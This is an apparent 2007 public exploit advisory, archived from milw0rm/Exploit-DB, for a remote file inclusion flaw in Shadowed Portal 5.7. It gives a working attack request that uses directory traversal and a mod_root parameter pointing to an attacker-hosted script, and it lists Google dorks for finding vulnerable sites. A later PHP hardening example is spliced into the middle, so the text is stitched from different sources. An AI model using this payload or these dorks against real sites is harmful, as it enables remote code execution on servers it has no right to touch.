____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
------------------------------------------------------------------------------------------------
This is a Public Exploit. 21/12/2007 (dd-mm-yyyy)
------------------------------------------------------------------------------------------------
§ Shadowed Portal 5.7 and maybe lower - Remote File Includes (Require) Vulnerabilities §
Vendor: http://www.shad0wed.com
Severity: Highest
Author: The:Paradox
Visit inj3ct-it.org
Proud to be Italian.
------------------------------------------------------------------------------------------------
Related Codes:
-- control.php; line 1:
<?php
require("config.php");
require("globals.php");
require("functions.php");
require("variables.php");
$return = setvar("return");
if($act == "login") {
    $online = 0;
    $usr = $_POST['usr'];
    $pwd = $_POST['pwd'];
    if(file_exists($root."/users/".strtolower($usr).".php")) {
        require($root."/users/".strtolower($usr).".php");
    }
-- globals.php; line 1:
<?php
define('CHECK',md5("null"));
global $viv;
global $mod;
global $act;
global $do;
global $act;
global $id;
global $tp;
global $w;
global $method;
global $board;
global $user;
global $pass;
global $cat;
global $linkback;
global $HTTP_POST_VARS;
global $_GET;
global $_POST;
global $_FILES;
global $HTTP_REFERER;
global $_SERVER;
-- /modules/fs/mod.php; line 1:
<?php
if(!defined('CHECK')) { exit; }
require($mod_root."/config.php");
------------------------------------------------------------------------------------------------
Bug Explanation:
This portal has a vulnerability in its "login system" that allows us to require a ".php" page from the "/users/" directory; however, by using directory traversal ("../") we can require any page.
Additionally, "CHECK" is defined by the required page globals.php, which allows us to bypass the "security-die" at the top of most PHP pages (see /modules/fs/mod.php; line 1).
If we require "/modules/fs/mod.php" with a $mod_root value, we can require a page external to the site.
We can send a POST request to control.php?act=login with the POST values usr=../modules/fs/mod&pwd=casualpass&mod_root=http://yoursite.org/yourscript? and get RFI.
------------------------------------------------------------------------------------------------
The require in control.php is extremely unsafe; it could be used with other pages to obtain other vulnerabilities.
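A hardened form of the login include shown above, as an added example that is not part of the original advisory or of Shadowed Portal's code. The helper resolve_user_file(), the name pattern and the demo directory tree are assumptions made for illustration:

```php
<?php
// Added example, not Shadowed Portal code. resolve_user_file() is a
// hypothetical helper; the name pattern and 32-char limit are assumptions.

/** Map a submitted login name to a file inside $root/users/, else null. */
function resolve_user_file(string $root, $usr): ?string
{
    if (!is_string($usr)) {            // e.g. usr[]=x arrives as an array
        return null;
    }
    $name = strtolower($usr);
    // Allowlist: no "/", "\", ".", NUL or ":" can reach the filesystem call.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $name)) {
        return null;
    }
    $base = realpath($root . '/users');
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.php');
    // Defence in depth: the canonical path must still sit under users/
    // (catches a symlinked user file pointing elsewhere).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// In control.php the login branch would become (sketch):
//     $file = resolve_user_file($root, $_POST['usr'] ?? null);
//     if ($file !== null) { require $file; }
// and modules/fs/mod.php would load its own config without $mod_root:
//     require __DIR__ . '/config.php';

// Constructed demo tree: one user record and one module file.
$root = sys_get_temp_dir() . '/sp_demo_' . getmypid();
mkdir($root . '/users', 0700, true);
mkdir($root . '/modules/fs', 0700, true);
file_put_contents($root . '/users/alice.php', "<?php // constructed user\n");
file_put_contents($root . '/modules/fs/mod.php', "<?php // constructed module\n");

foreach (['Alice', '../modules/fs/mod', ['x'], 'nobody'] as $usr) {
    $file = resolve_user_file($root, $usr);
    echo json_encode($usr, JSON_UNESCAPED_SLASHES), ' => ',
        $file === null ? 'rejected' : 'users/' . basename($file), "\n";
}
array_map('unlink', [$root . '/users/alice.php', $root . '/modules/fs/mod.php']);
array_map('rmdir', [$root . '/users', $root . '/modules/fs', $root . '/modules', $root]);
```

Independently of the code change, allow_url_include = Off in php.ini (the default since PHP 5.2.0) stops require from fetching http:// URLs.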
------------------------------------------------------------------------------------------------
Google Dork-> Powered by Shadowed Portal
Google Dork-> These script's code is Copyright 2003-2006 by Shadowed Works.
------------------------------------------------------------------------------------------------
Use this exploit at your own risk. You are responsible for your own deeds.
------------------------------------------------------------------------------------------------
Use your brain, do not lame. Enjoy. =)
# milw0rm.com [2007-12-21]
{"id": "EDB-ID:4769", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Shadowed Portal <= 5.7d3 POST Remote File Inclusion Vulnerability", "description": "Shadowed Portal <= 5.7d3 (POST) Remote File Inclusion Vulnerability. Webapps exploit for php platform", "published": "2007-12-21T00:00:00", "modified": "2007-12-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/4769/", "reporter": "The:Paradox", "references": [], "cvelist": [], "lastseen": "2016-01-31T21:44:09", "viewCount": 5, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-01-31T21:44:09", "rev": 2}, "dependencies": {"references": [], "modified": "2016-01-31T21:44:09", "rev": 2}, "vulnersScore": -0.2}, "sourceHref": "https://www.exploit-db.com/download/4769/", "osvdbidlist": ["42666"]}